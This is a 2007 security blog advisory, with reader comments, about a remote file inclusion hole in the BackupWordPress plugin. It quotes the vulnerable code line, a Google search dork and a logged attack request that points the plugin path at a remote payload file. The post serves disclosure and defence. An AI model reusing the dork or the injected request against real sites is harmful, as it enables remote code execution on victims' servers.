BackUpWordPress Remote File Include Vulnerability

Posted by DK
November 2, 2007

A remote file include vulnerability has been found in BackupWordpress < 0.4.3.

This means if an attacker can execute code on your web server if they can access the following script directly:

http://[target]/_path]/plugins/BackUp/Archive.php

A proof of concept exploit has already been released into the wild. We suggest you upgrade as soon as possible.

Affected code:

require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php";

A new version is available here.

It looks like attackers are already starting to query Google for affected web sites: 

http://www.google.com.br/search?hl=pt-BR&client=firefox-a&
q="plugins/BackUp/Archive/"&btnG=Pesquisar&meta=

AND

209.190.23.66 - - [02/Nov/2007:11:51:14 +0000] "
GET /category/wordpress/articles//BackUp/Archive/Reader.php?
bkpwp_plugin_path=http://www.freewebtown.com/komandan/tool/q3.txt??
HTTP/1.1" 404 13951 "-" "libwww-perl/5.808"
Advisories, Alerts, WordPress

Random Posts

If you enjoyed this post, please leave a comment or subscribe to the feed and get future articles delivered to your feed reader.

Comments
Pingback by blogator.de » Blog Archive » Sicherheitslücke: BackUpWordPress on November 2, 2007 @ 1:02 pm

[...] gibt es eine Sicherheitslücke in BackUpWordPress und passend dazu einen Exploit (Nur für Tests verwenden). Eine gefixt Version [...]

Pingback by BlogSecurity » Blog Archive » WordPress BlogWatch on November 2, 2007 @ 1:30 pm

[...] Remote File Inclusion (more) [...]

Comment by Philipp on November 2, 2007 @ 1:33 pm

That’s awesome to see how fast attacker apply these new holes to their software…Not even as Security aware guy, you’re really safe from getting hit as you can’t react/check your plugins so often and fast…

Comment by DK on November 2, 2007 @ 3:08 pm

Phil, indeed, although our htaccess guide would have prevented this attack.

Comment by Donncha O Caoimh on November 2, 2007 @ 3:52 pm

Saw a few of those queries on my blog this morning. Luckily I don’t run that script!

Comment by alex on November 2, 2007 @ 3:54 pm

I don’t like backup plugins because they often contain many security issues.

After a quick look, I found another security issue that allows the execution of SQL queries.

Comment by DK on November 2, 2007 @ 4:03 pm

Donncha, check out http://blogsecurity.net/wordpress/article-210607/

These steps would have mitigated the risk of this attack :)

Alex, its a great plugin, but its new… perhaps we should get involved and sponser it.

Comment by Truden on November 3, 2007 @ 7:31 am

First time to see someone saying “Nice plugin, let sponsor it.”
Made my day :)

Pingback by Remote file inclusion encontrado no plugin BackupWordPress | Security Hub - Segurança da informação on November 5, 2007 @ 11:04 am

[...] Blog Security. Gostou deste post? Então assine o feed RSS! Nos meus feeds você não lê só a introdução, [...]

Pingback by WordPress tuto a été hacké - Alerte sur BackupWordPress on November 6, 2007 @ 12:34 am

[...] soit le plugin BackupWordPress car je l’avais installé pour le tester et d’après ce message de BlogSecurity, il était vulnérable ce [...]

Leave a comment

(required)

(required)